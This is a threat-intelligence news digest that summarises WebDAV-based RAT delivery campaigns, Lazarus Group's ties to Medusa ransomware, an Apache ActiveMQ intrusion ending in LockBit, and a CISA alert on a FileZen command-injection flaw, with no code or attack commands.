Cyware Daily Threat Intelligence, February 25, 2026

Old dog, new tricks. Attackers are abusing Windows File Explorer WebDAV support to deliver multi-stage malware, with 87% of campaigns ending in RATs like XWorm RAT, AsyncRAT, and DcRAT.

Lazarus Group has aligned with Medusa ransomware (now RaaS) to financially target a Middle Eastern enterprise using tools like Comebacker and Blindingcan.

Attackers exploited Apache ActiveMQ (CVE-2023-46604), returned 18 days later via RDP, and deployed LockBit using Metasploit and AnyDesk for lateral movement.

Top Malware Reported in the Last 24 Hours

Windows File Explorer under siege

Threat actors exploit Windows File Explorer's support for WebDAV, a legacy HTTP-based file management protocol, to trick victims into downloading malware. WebDAV, though deprecated in November 2023, is rarely used today, making it an obscure and exploitable attack vector.  Campaigns using WebDAV for malware delivery have been active since February 2024 and often involve complex chains of payloads and legitimate files. 87% of all Active Threat Reports (ATRs) using this tactic deliver multiple Remote Access Trojans (RATs) as final payloads, including XWorm RAT, Async RAT, and DcRAT. 

North Korean cybercriminals target critical infrastructure

The Lazarus Group, a North Korean state-sponsored threat actor, has partnered with Medusa ransomware for recent attacks. Medusa ransomware transitioned to a ransomware-as-a-service (RaaS) model in 2024, aligning with Lazarus's history of extortion and financially motivated cybercrime. The Middle Eastern target was a large business, attacked purely for financial gains, not strategic or intellectual property reasons. Lazarus used additional malware, including Comebacker backdoor, Blindingcan RAT, and Infohook infostealer, in the attacks. The group employs tactics like "bring-your-own-vulnerable-driver" (BYOVD) to bypass security defenses.

Top Vulnerabilities Reported in the Last 24 Hours

Apache ActiveMQ vulnerability exploited

In a recent cyberattack, threat actors exploited a vulnerability (CVE-2023-46604) in an Apache ActiveMQ server to gain initial access to an organization's network. Despite being evicted after the first breach, they returned 18 days later and successfully re-compromised the system. Using Remote Desktop Protocol (RDP) and credentials obtained during the first attack, they deployed LockBit ransomware, encrypting files across multiple systems. The attackers utilized tools like Metasploit, AnyDesk, and Windows CertUtil to escalate privileges, move laterally within the network, and achieve persistence.

Critical OS Command Injection flaw in FileZen

CISA has issued an alert about the active exploitation of a critical OS Command Injection vulnerability (CVE-2026-25108) in FileZen, a file-sharing product by Soliton Systems K.K. This vulnerability can allow attackers to execute arbitrary OS commands, potentially leading to full system compromise. Federal agencies are mandated to address this vulnerability within a specific timeframe, and CISA strongly advises all organizations to prioritize patching and mitigation efforts to protect against cyber threats.